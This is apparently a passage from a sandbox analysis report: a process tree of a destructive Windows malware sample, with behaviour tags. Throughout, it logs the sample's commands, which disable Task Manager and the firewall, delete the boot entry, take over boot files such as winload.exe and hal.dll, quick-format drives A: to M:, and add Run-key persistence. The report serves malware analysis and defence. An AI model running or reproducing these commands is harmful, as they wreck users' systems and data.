        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5768
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:6436
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6904
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7208
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7368
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7536
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7568
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7608
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7724
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7852
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7892
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7940
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8000
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8048
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8084
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8128
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:4708
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6860
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8204
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8244
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8276
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8320
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8372
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8416
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8448
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8488
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:8512
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9912
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11508
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12432
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12864
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:13492
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3092
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3108
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3120
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3132
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3144
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        
        PID:3444
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4068
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3732
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4256
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4324
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4820
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4924
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4332
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:5104
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        
        PID:4140
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        
        PID:4932
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        
        PID:3308
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2368
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3360
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2116
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4040
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4140
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4824
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:4340
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2481.tmp\2482.tmp\2483.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:8908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:9860
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:9952
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:11012
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3816
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:11724
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:2108
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:6388
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:13024
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:12660
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4204
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5872
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:12812
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4432
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:4132
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4644
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:4316
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:4576
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2BE1.tmp\2BE2.tmp\2BE3.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:9212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:9456
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:9576
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:9168
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:10640
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:11864
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:5232
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:12328
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13200
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:11156
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:12984
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13076
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13168
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5124
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5148
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5164
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5184
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5224
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2EED.tmp\3100.tmp\3101.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:9252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:10604
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:10684
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:11488
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:11752
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:5780
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:12652
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:12980
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:12812
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:13168
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:8680
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13380
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13420
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5244
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5268
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5292
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5316
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:5400
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:5692
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:5856
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:6436
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:6788
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:7084
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:6416
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:3976
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:7632
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:9076
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:10788
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:11156
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\MSNP.ax"
        5⤵
        
        PID:12016
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\MSNP.ax" /reset /c /q
        5⤵
        
        PID:7992
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\MSNP.ax"
        5⤵
        Views/modifies file attributes
        
        PID:13608
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2608
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2628
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2812
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2808
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1072
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8B9D.tmp\8B9E.tmp\8B9F.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      Drops startup file
      PID:264
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:944
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1332
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:2976
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2988
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:300
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:1592
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:2608
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:1948
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:2300
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:2236
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:2140
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:2408
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:692
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:1588
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:1332
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2604
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2592
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2860
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2416
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:940
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2136
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2492
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2516
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2804
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:300
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2188
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A90B.tmp\A90C.tmp\A90D.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3688
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:6812
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:4200
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:4640
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:5096
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:4268
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:4776
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:1996
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:4660
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4260
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:4624
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3504
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4216
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:5976
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6900
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7064
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:6480
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6508
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6936
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6932
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6840
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7000
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6732
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5136
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6976
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6916
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:6984
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7048
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:5392
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:6096
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:6216
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:6284
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6400
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6192
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:5836
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:6884
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6684
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7144
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7220
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7376
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:7544
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8968
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10660
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11872
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        
        PID:13108
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:7044
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1996
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2936
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2028
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:2016
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1964
      - C:\Windows\system32\cmd.exe
        
